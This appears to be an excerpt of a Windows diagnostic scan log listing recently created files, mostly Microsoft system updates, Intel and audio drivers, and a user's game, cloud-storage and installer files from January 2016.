2016-01-27 15:17 - 2016-01-16 00:31 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2016-01-27 15:17 - 2016-01-16 00:31 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-01-27 15:17 - 2016-01-16 00:31 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2016-01-27 15:17 - 2016-01-16 00:30 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-01-27 15:17 - 2016-01-16 00:30 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimCfg.dll
2016-01-27 15:17 - 2016-01-16 00:28 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-01-27 15:17 - 2016-01-16 00:28 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimAuth.dll
2016-01-27 15:17 - 2016-01-16 00:26 - 19338752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-01-27 15:17 - 2016-01-16 00:26 - 00535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2016-01-27 15:17 - 2016-01-16 00:25 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll
2016-01-27 15:17 - 2016-01-16 00:24 - 18678272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-01-27 15:17 - 2016-01-16 00:24 - 02057216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2016-01-27 15:17 - 2016-01-16 00:24 - 00613888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2016-01-27 15:17 - 2016-01-16 00:24 - 00273408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2016-01-27 15:17 - 2016-01-16 00:21 - 06297088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-01-27 15:17 - 2016-01-16 00:19 - 12126208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-01-27 15:17 - 2016-01-16 00:18 - 03593216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-01-27 15:17 - 2016-01-16 00:17 - 05503488 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2016-01-27 15:17 - 2016-01-16 00:15 - 04759040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2016-01-27 15:17 - 2016-01-16 00:14 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-01-27 15:17 - 2016-01-16 00:14 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-01-27 15:16 - 2016-01-16 01:37 - 00202472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll
2016-01-27 15:16 - 2016-01-16 01:36 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-01-27 15:16 - 2016-01-16 01:36 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-01-27 15:16 - 2016-01-16 01:34 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-01-27 15:16 - 2016-01-16 01:24 - 00538632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2016-01-27 15:16 - 2016-01-16 01:23 - 00848160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-01-27 15:16 - 2016-01-16 01:23 - 00785088 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2016-01-27 15:16 - 2016-01-16 01:23 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-01-27 15:16 - 2016-01-16 01:23 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-01-27 15:16 - 2016-01-16 01:23 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-01-27 15:16 - 2016-01-16 01:21 - 22572624 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-01-27 15:16 - 2016-01-16 01:21 - 01750440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcMon.exe
2016-01-27 15:16 - 2016-01-16 01:20 - 00652312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2016-01-27 15:16 - 2016-01-16 01:20 - 00431240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll
2016-01-27 15:16 - 2016-01-16 01:20 - 00366224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
2016-01-27 15:16 - 2016-01-16 01:19 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-01-27 15:16 - 2016-01-16 01:19 - 00405568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-01-27 15:16 - 2016-01-16 01:12 - 01415200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-01-27 15:16 - 2016-01-16 01:08 - 01174008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-01-27 15:16 - 2016-01-16 01:08 - 00440152 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2016-01-27 15:16 - 2016-01-16 00:46 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbser.sys
2016-01-27 15:16 - 2016-01-16 00:44 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-01-27 15:16 - 2016-01-16 00:44 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasadhlp.dll
2016-01-27 15:16 - 2016-01-16 00:44 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll
2016-01-27 15:16 - 2016-01-16 00:42 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-01-27 15:16 - 2016-01-16 00:41 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2016-01-27 15:16 - 2016-01-16 00:40 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasauto.dll
2016-01-27 15:16 - 2016-01-16 00:40 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaui.exe
2016-01-27 15:16 - 2016-01-16 00:40 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasautou.exe
2016-01-27 15:16 - 2016-01-16 00:39 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\FilterDS.dll
2016-01-27 15:16 - 2016-01-16 00:38 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-01-27 15:16 - 2016-01-16 00:38 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimCfg.dll
2016-01-27 15:16 - 2016-01-16 00:38 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winbio.dll
2016-01-27 15:16 - 2016-01-16 00:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-01-27 15:16 - 2016-01-16 00:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-01-27 15:16 - 2016-01-16 00:37 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2016-01-27 15:16 - 2016-01-16 00:37 - 00073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-01-27 15:16 - 2016-01-16 00:36 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-01-27 15:16 - 2016-01-16 00:36 - 00475648 _____ (Microsoft Corporation) C:\WINDOWS\system32\DDDS.dll
2016-01-27 15:16 - 2016-01-16 00:36 - 00221696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-01-27 15:16 - 2016-01-16 00:36 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimAuth.dll
2016-01-27 15:16 - 2016-01-16 00:36 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastlsext.dll
2016-01-27 15:16 - 2016-01-16 00:35 - 00383488 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-01-27 15:16 - 2016-01-16 00:35 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasadhlp.dll
2016-01-27 15:16 - 2016-01-16 00:34 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-01-27 15:16 - 2016-01-16 00:34 - 00477696 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
2016-01-27 15:16 - 2016-01-16 00:34 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-01-27 15:16 - 2016-01-16 00:33 - 00574976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2016-01-27 15:16 - 2016-01-16 00:33 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-01-27 15:16 - 2016-01-16 00:32 - 00621568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2016-01-27 15:16 - 2016-01-16 00:32 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pcaui.exe
2016-01-27 15:16 - 2016-01-16 00:31 - 00851456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-01-27 15:16 - 2016-01-16 00:31 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasautou.exe
2016-01-27 15:16 - 2016-01-16 00:30 - 02127360 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-01-27 15:16 - 2016-01-16 00:30 - 01053696 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-01-27 15:16 - 2016-01-16 00:30 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-01-27 15:16 - 2016-01-16 00:30 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winbio.dll
2016-01-27 15:16 - 2016-01-16 00:29 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2016-01-27 15:16 - 2016-01-16 00:29 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-01-27 15:16 - 2016-01-16 00:28 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-01-27 15:16 - 2016-01-16 00:28 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-01-27 15:16 - 2016-01-16 00:28 - 00884736 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdlg.dll
2016-01-27 15:16 - 2016-01-16 00:27 - 00335872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-01-27 15:16 - 2016-01-16 00:26 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-01-27 15:16 - 2016-01-16 00:26 - 00260608 _____ C:\WINDOWS\system32\MTFServer.dll
2016-01-27 15:16 - 2016-01-16 00:26 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-01-27 15:16 - 2016-01-16 00:25 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-01-27 15:16 - 2016-01-16 00:25 - 00235008 _____ C:\WINDOWS\system32\MTF.dll
2016-01-27 15:16 - 2016-01-16 00:24 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-01-27 15:16 - 2016-01-16 00:23 - 02050048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-01-27 15:16 - 2016-01-16 00:23 - 00687616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-01-27 15:16 - 2016-01-16 00:20 - 07199232 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-01-27 15:16 - 2016-01-16 00:20 - 02597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-01-27 15:16 - 2016-01-16 00:20 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-01-27 15:16 - 2016-01-16 00:20 - 00799744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasdlg.dll
2016-01-27 15:16 - 2016-01-16 00:19 - 00733184 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2016-01-27 15:16 - 2016-01-16 00:19 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-01-27 15:16 - 2016-01-16 00:19 - 00162816 _____ C:\WINDOWS\SysWOW64\MTF.dll
2016-01-27 15:16 - 2016-01-16 00:19 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-01-27 15:16 - 2016-01-16 00:18 - 01674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2016-01-27 15:16 - 2016-01-16 00:16 - 05202944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-01-27 15:16 - 2016-01-16 00:16 - 01542656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2016-01-27 15:16 - 2016-01-16 00:11 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2016-01-27 15:16 - 2016-01-16 00:09 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-01-27 12:28 - 2016-01-27 12:26 - 00002030 _____ C:\Users\sesay\Desktop\firewall security.txt
2016-01-27 12:26 - 2016-01-27 12:26 - 00002030 _____ C:\Users\sesay\Documents\firewall security.txt
2016-01-27 11:32 - 2016-01-27 11:32 - 00000000 ____D C:\Users\sesay\AppData\Local\Citrix
2016-01-26 21:52 - 2016-01-26 21:52 - 00000222 _____ C:\Users\sesay\Desktop\Unturned.url
2016-01-25 21:06 - 2016-01-26 21:22 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Trove
2016-01-25 20:54 - 2016-01-25 20:54 - 00000222 _____ C:\Users\sesay\Desktop\Trove.url
2016-01-25 17:23 - 2011-04-13 14:56 - 00245792 _____ C:\Users\sesay\Downloads\MCSkinEdit.jar
2016-01-25 17:17 - 2016-01-25 17:17 - 00000000 ____D C:\Users\MuhammadAkim\AppData\Local\Mega Limited
2016-01-24 21:05 - 2016-01-24 21:20 - 186613007 _____ C:\Users\sesay\Desktop\Recording #5.mp4
2016-01-22 16:13 - 2016-01-24 21:29 - 00000000 ____D C:\Users\sesay\Desktop\Cloud Drive
2016-01-22 16:01 - 2016-01-22 16:01 - 00002443 _____ C:\Users\sesay\Desktop\AquaKnight563 - Chrome.lnk
2016-01-22 15:48 - 2016-01-22 15:48 - 00927824 _____ (Google Inc.) C:\Users\sesay\Downloads\ChromeSetup.exe
2016-01-22 15:36 - 2016-01-22 15:55 - 00000000 ___RD C:\Users\sesay\Documents\MEGA
2016-01-22 15:33 - 2016-01-22 15:43 - 00000000 ____D C:\Users\sesay\Documents\MEGAsync Downloads
2016-01-22 15:33 - 2016-01-22 15:33 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MEGAsync
2016-01-22 15:33 - 2016-01-22 15:33 - 00000000 ____D C:\Users\sesay\AppData\Local\Mega Limited
2016-01-22 15:31 - 2016-01-22 15:32 - 10335064 _____ (MEGA Limited) C:\Users\sesay\Downloads\MEGAsyncSetup.exe
2016-01-21 09:24 - 2016-01-21 09:24 - 00000000 ____D C:\Users\sesay\Documents\Curse
2016-01-21 09:21 - 2016-01-25 21:39 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Curse Client
2016-01-21 09:21 - 2016-01-21 09:21 - 00001088 _____ C:\Users\sesay\Desktop\Curse.lnk
2016-01-21 09:21 - 2016-01-21 09:21 - 00001074 _____ C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Curse.lnk
2016-01-21 09:20 - 2016-01-21 09:20 - 51968480 _____ (Curse) C:\Users\sesay\Downloads\CurseClientSetup.exe
2016-01-21 09:20 - 2016-01-21 09:20 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Curse
2016-01-19 23:15 - 2016-01-19 23:15 - 32710176 _____ (Intel Corporation) C:\WINDOWS\system32\igdumdim64.dll
2016-01-19 23:15 - 2016-01-19 23:15 - 31776384 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdumdim32.dll
2016-01-19 23:15 - 2016-01-19 23:15 - 01816720 _____ (Intel Corporation) C:\WINDOWS\system32\iglhsip64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 27589696 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igd11dxva32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 15470112 _____ (Intel Corporation) C:\WINDOWS\system32\igc64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 13442816 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igc32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 11449472 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igd10iumd32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 05046200 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdusc32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 04507576 _____ (Intel Corporation) C:\WINDOWS\system32\igd12umd64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 04352888 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igd12umd32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 02160464 _____ (Intel Corporation) C:\WINDOWS\system32\igdmd64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 01814056 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\iglhsip32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 01677872 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdmd32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00435088 _____ (Intel Corporation) C:\WINDOWS\system32\igfx11cmrt64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00433968 _____ (Intel Corporation) C:\WINDOWS\system32\igfxcmrt64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00381928 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfx11cmrt32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00379792 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfxcmrt32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00312808 _____ (Intel Corporation) C:\WINDOWS\system32\igd10idpp64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00297168 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igd10idpp32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00242160 _____ (Intel Corporation) C:\WINDOWS\system32\iglhcp64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00222736 _____ (Intel Corporation) C:\WINDOWS\system32\igdde64.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00205360 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\iglhcp32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00181328 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdde32.dll
2016-01-19 23:14 - 2016-01-19 23:14 - 00055248 _____ (Intel Corporation) C:\WINDOWS\system32\igfxexps.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 29101576 _____ (Intel Corporation) C:\WINDOWS\system32\common_clang64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 19861512 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\common_clang32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 11591688 _____ (Intel Corporation) C:\WINDOWS\system32\ig75icd64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 08638472 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\ig75icd32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 05685760 _____ (Intel Corporation) C:\WINDOWS\system32\igdmcl64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 05262856 _____ (Intel Corporation) C:\WINDOWS\system32\GfxResources.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 04638720 _____ (Intel Corporation) C:\WINDOWS\system32\igdrcl64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 04170248 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdrcl32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 03970056 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdmcl32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 01576960 _____ (Intel Corporation) C:\WINDOWS\system32\igfxcmjit64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 01167880 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfxcmjit32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 01027032 _____ C:\WINDOWS\system32\igfxSDK.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00963032 _____ (Intel Corporation) C:\WINDOWS\system32\Gfxv4_0.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00959456 _____ (Intel Corporation) C:\WINDOWS\system32\Gfxv2_0.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00626696 _____ (Intel Corporation) C:\WINDOWS\system32\MetroIntelGenericUIFramework.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00623064 _____ (Intel Corporation) C:\WINDOWS\system32\IntelCpHDCPSvc.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00536536 _____ (Intel Corporation) C:\WINDOWS\system32\IntelWiDiUMS64.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00466912 _____ (Intel Corporation) C:\WINDOWS\system32\GfxUIEx.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00439304 _____ (Intel Corporation) C:\WINDOWS\system32\igdbcl64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00416256 _____ (Intel Corporation) C:\WINDOWS\system32\IntelOpenCL64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00402904 _____ C:\WINDOWS\system32\igfxTray.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00390144 _____ (Intel Corporation) C:\WINDOWS\system32\igfxOSP.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00388616 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdbcl32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00350184 _____ (Intel Corporation) C:\WINDOWS\system32\IntelWiDiMCComp64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00318472 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\IntelOpenCL32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00273416 _____ C:\WINDOWS\system32\igfxCPL.cpl
2016-01-19 23:12 - 2016-01-19 23:12 - 00266240 _____ (Intel Corporation) C:\WINDOWS\system32\igdfcl64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00255488 _____ (Intel Corporation) C:\WINDOWS\system32\igfxDTCM.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00237016 _____ (Intel Corporation) C:\WINDOWS\system32\igfxext.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00232408 _____ (Intel Corporation) C:\WINDOWS\system32\DPTopologyApp.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00231904 _____ (Intel Corporation) C:\WINDOWS\system32\DPTopologyAppv2_0.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00225288 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdfcl32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00206848 _____ (Intel Corporation) C:\WINDOWS\system32\igfxCoIn_v4360.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00193032 _____ (Intel Corporation) C:\WINDOWS\system32\igdail64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00175064 _____ (Intel Corporation) C:\WINDOWS\system32\difx64.exe
2016-01-19 23:12 - 2016-01-19 23:12 - 00173064 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdail32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00111624 _____ ( ) C:\WINDOWS\system32\igfxSDKLibv2_0.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00103944 _____ (Khronos Group) C:\WINDOWS\SysWOW64\Intel_OpenCL_ICD32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00103432 _____ C:\WINDOWS\system32\igfxCUIServicePS.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00100864 _____ ( ) C:\WINDOWS\system32\igfxSDKLib.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00099848 _____ (Khronos Group) C:\WINDOWS\system32\Intel_OpenCL_ICD64.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00095240 _____ ( ) C:\WINDOWS\system32\igfxDHLibv2_0.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00083456 _____ ( ) C:\WINDOWS\system32\igfxDHLib.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00052744 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfxexps32.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00029192 _____ ( ) C:\WINDOWS\system32\igfxDILibv2_0.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00029192 _____ ( ) C:\WINDOWS\system32\igfxDILib.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00027656 _____ ( ) C:\WINDOWS\system32\igfxEMLib.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00027648 _____ ( ) C:\WINDOWS\system32\igfxEMLibv2_0.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00022536 _____ ( ) C:\WINDOWS\system32\igfxLHMLib.dll
2016-01-19 23:12 - 2016-01-19 23:12 - 00022528 _____ ( ) C:\WINDOWS\system32\igfxLHMLibv2_0.dll
2016-01-19 19:28 - 2016-01-19 19:28 - 00014155 _____ C:\Users\sesay\Downloads\WORKSHEETCSECTIONCHECKLISTBACKGROUND.pdf
2016-01-15 00:24 - 2016-01-15 00:24 - 10093736 _____ (Intel Corporation) C:\WINDOWS\system32\IntelSSTAPO.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 03319456 _____ (Fortemedia Corporation) C:\WINDOWS\system32\FMAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 02157920 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01624744 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64APO.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01456464 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01377072 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01348880 _____ (DTS, Inc.) C:\WINDOWS\system32\slcnt64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01037968 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00704696 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00602984 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SECOMN32.DLL
2016-01-15 00:24 - 2016-01-15 00:24 - 00588632 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAC64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00545816 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00479992 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00399464 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00393480 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00355496 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00352904 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00352904 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00342272 _____ (Waves Audio Ltd.) C:\WINDOWS\system32\MaxxAudioAPO20.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00333288 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00333288 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
